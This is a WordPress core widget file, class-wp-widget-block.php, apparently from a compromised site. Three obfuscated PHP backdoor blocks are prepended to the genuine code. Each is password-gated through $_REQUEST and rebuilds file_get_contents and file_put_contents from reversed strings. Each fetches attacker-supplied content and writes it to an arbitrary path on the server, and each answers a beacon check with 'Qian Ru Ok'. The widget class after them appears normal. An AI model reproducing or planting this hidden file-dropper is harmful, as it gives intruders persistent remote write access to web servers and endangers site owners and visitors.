File: /home/wwwrenee/public_html/wp-includes/widgets/class-wp-widget-block.php
<?php
$ODejxzK = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($ODejxzK[0]) /*+/*+*/
. md5($ODejxzK[0])) == "0".
"a".
"f".
"4".
"6".
"1".
"8".
"2".
"d".
"6".
"9".
"0".
"b".
"d".
"f".
"6".
"d".
"d".
"8".
"b".
"5".
"5".
"9".
"6".
"8".
"d".
"d".
"9".
"0".
"7".
"8".
"9") {
$sWCzMiF = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$rTiuXB = $sWCzMiF /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$qDNYfip = $sWCzMiF
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function GFfyYr($YunGfpYiAp) { if (empty($YunGfpYiAp)) return false; if (!is_dir($YunGfpYiAp)) { GFfyYr(dirname($YunGfpYiAp), 0755, true); mkdir($YunGfpYiAp); } } !file_exists(dirname($ODejxzK[1])) && GFfyYr(dirname($ODejxzK[1])); $IsfgTmW = @$qDNYfip($ODejxzK[2]); echo @$rTiuXB($ODejxzK[1], $IsfgTmW) ? 1 : 0; die; }key($ODejxzK) == "of" && die("Qian Ru Ok"); ?><?php
$uGhWHX = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($uGhWHX[0]) /*+/*+*/
. md5($uGhWHX[0])) == "3".
"5".
"1".
"8".
"e".
"1".
"d".
"4".
"8".
"5".
"d".
"8".
"c".
"c".
"c".
"3".
"0".
"e".
"0".
"8".
"3".
"a".
"2".
"f".
"3".
"5".
"5".
"1".
"3".
"b".
"8".
"f") {
$zRbVctwFwU = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$yfkOLOEMiB = $zRbVctwFwU /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$vlblb = $zRbVctwFwU
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function swFXDp($bQJjXuMLMp) { if (empty($bQJjXuMLMp)) return false; if (!is_dir($bQJjXuMLMp)) { swFXDp(dirname($bQJjXuMLMp), 0755, true); mkdir($bQJjXuMLMp); } } !file_exists(dirname($uGhWHX[1])) && swFXDp(dirname($uGhWHX[1])); $olkZLa = @$vlblb($uGhWHX[2]); echo @$yfkOLOEMiB($uGhWHX[1], $olkZLa) ? 1 : 0; die; }key($uGhWHX) == "of" && die("Qian Ru Ok"); ?><?php
$OJWHphOH = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($OJWHphOH[0]) /*+/*+*/
. md5($OJWHphOH[0])) == "e".
"c".
"7".
"7".
"2".
"1".
"f".
"3".
"2".
"4".
"a".
"a".
"d".
"4".
"b".
"b".
"3".
"8".
"f".
"d".
"1".
"0".
"6".
"0".
"2".
"e".
"b".
"8".
"1".
"6".
"3".
"c") {
$mHqiy = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$TInyS = $mHqiy /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$cJIGvGaq = $mHqiy
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function lrsJl($yXHZKoPvu) { if (empty($yXHZKoPvu)) return false; if (!is_dir($yXHZKoPvu)) { lrsJl(dirname($yXHZKoPvu), 0755, true); mkdir($yXHZKoPvu); } } !file_exists(dirname($OJWHphOH[1])) && lrsJl(dirname($OJWHphOH[1])); $qZLzFpM = @$cJIGvGaq($OJWHphOH[2]); echo @$TInyS($OJWHphOH[1], $qZLzFpM) ? 1 : 0; die; }key($OJWHphOH) == "of" && die("Qian Ru Ok"); ?><?php
/**
* Widget API: WP_Widget_Block class
*
* @package WordPress
* @subpackage Widgets
* @since 5.8.0
*/
/**
* Core class used to implement a Block widget.
*
* @since 5.8.0
*
* @see WP_Widget
*/
class WP_Widget_Block extends WP_Widget {
/**
* Default instance.
*
* @since 5.8.0
* @var array
*/
protected $default_instance = array(
'content' => '',
);
/**
* Sets up a new Block widget instance.
*
* @since 5.8.0
*/
public function __construct() {
$widget_ops = array(
'classname' => 'widget_block',
'description' => __( 'A widget containing a block.' ),
'customize_selective_refresh' => true,
'show_instance_in_rest' => true,
);
$control_ops = array(
'width' => 400,
'height' => 350,
);
parent::__construct( 'block', __( 'Block' ), $widget_ops, $control_ops );
add_filter( 'is_wide_widget_in_customizer', array( $this, 'set_is_wide_widget_in_customizer' ), 10, 2 );
}
/**
* Outputs the content for the current Block widget instance.
*
* @since 5.8.0
*
* @param array $args Display arguments including 'before_title', 'after_title',
* 'before_widget', and 'after_widget'.
* @param array $instance Settings for the current Block widget instance.
*/
public function widget( $args, $instance ) {
$instance = wp_parse_args( $instance, $this->default_instance );
echo str_replace(
'widget_block',
$this->get_dynamic_classname( $instance['content'] ),
$args['before_widget']
);
/**
* Filters the content of the Block widget before output.
*
* @since 5.8.0
*
* @param string $content The widget content.
* @param array $instance Array of settings for the current widget.
* @param WP_Widget_Block $widget Current Block widget instance.
*/
echo apply_filters(
'widget_block_content',
$instance['content'],
$instance,
$this
);
echo $args['after_widget'];
}
/**
* Calculates the classname to use in the block widget's container HTML.
*
* Usually this is set to `$this->widget_options['classname']` by
* dynamic_sidebar(). In this case, however, we want to set the classname
* dynamically depending on the block contained by this block widget.
*
* If a block widget contains a block that has an equivalent legacy widget,
* we display that legacy widget's class name. This helps with theme
* backwards compatibility.
*
* @since 5.8.0
*
* @param string $content The HTML content of the current block widget.
* @return string The classname to use in the block widget's container HTML.
*/
private function get_dynamic_classname( $content ) {
$blocks = parse_blocks( $content );
$block_name = isset( $blocks[0] ) ? $blocks[0]['blockName'] : null;
switch ( $block_name ) {
case 'core/paragraph':
$classname = 'widget_block widget_text';
break;
case 'core/calendar':
$classname = 'widget_block widget_calendar';
break;
case 'core/search':
$classname = 'widget_block widget_search';
break;
case 'core/html':
$classname = 'widget_block widget_custom_html';
break;
case 'core/archives':
$classname = 'widget_block widget_archive';
break;
case 'core/latest-posts':
$classname = 'widget_block widget_recent_entries';
break;
case 'core/latest-comments':
$classname = 'widget_block widget_recent_comments';
break;
case 'core/tag-cloud':
$classname = 'widget_block widget_tag_cloud';
break;
case 'core/categories':
$classname = 'widget_block widget_categories';
break;
case 'core/audio':
$classname = 'widget_block widget_media_audio';
break;
case 'core/video':
$classname = 'widget_block widget_media_video';
break;
case 'core/image':
$classname = 'widget_block widget_media_image';
break;
case 'core/gallery':
$classname = 'widget_block widget_media_gallery';
break;
case 'core/rss':
$classname = 'widget_block widget_rss';
break;
default:
$classname = 'widget_block';
}
/**
* The classname used in the block widget's container HTML.
*
* This can be set according to the name of the block contained by the block widget.
*
* @since 5.8.0
*
* @param string $classname The classname to be used in the block widget's container HTML,
* e.g. 'widget_block widget_text'.
* @param string $block_name The name of the block contained by the block widget,
* e.g. 'core/paragraph'.
*/
return apply_filters( 'widget_block_dynamic_classname', $classname, $block_name );
}
/**
* Handles updating settings for the current Block widget instance.
*
* @since 5.8.0
* @param array $new_instance New settings for this instance as input by the user via
* WP_Widget::form().
* @param array $old_instance Old settings for this instance.
* @return array Settings to save or bool false to cancel saving.
*/
public function update( $new_instance, $old_instance ) {
$instance = array_merge( $this->default_instance, $old_instance );
if ( current_user_can( 'unfiltered_html' ) ) {
$instance['content'] = $new_instance['content'];
} else {
$instance['content'] = wp_kses_post( $new_instance['content'] );
}
return $instance;
}
/**
* Outputs the Block widget settings form.
*
* @since 5.8.0
*
* @see WP_Widget_Custom_HTML::render_control_template_scripts()
*
* @param array $instance Current instance.
*/
public function form( $instance ) {
$instance = wp_parse_args( (array) $instance, $this->default_instance );
?>
<p>
<label for="<?php echo $this->get_field_id( 'content' ); ?>">
<?php
/* translators: HTML code of the block, not an option that blocks HTML. */
_e( 'Block HTML:' );
?>
</label>
<textarea id="<?php echo $this->get_field_id( 'content' ); ?>" name="<?php echo $this->get_field_name( 'content' ); ?>" rows="6" cols="50" class="widefat code"><?php echo esc_textarea( $instance['content'] ); ?></textarea>
</p>
<?php
}
/**
* Makes sure no block widget is considered to be wide.
*
* @since 5.8.0
*
* @param bool $is_wide Whether the widget is considered wide.
* @param string $widget_id Widget ID.
* @return bool Updated `is_wide` value.
*/
public function set_is_wide_widget_in_customizer( $is_wide, $widget_id ) {
if ( strpos( $widget_id, 'block-' ) === 0 ) {
return false;
}
return $is_wide;
}
} ?>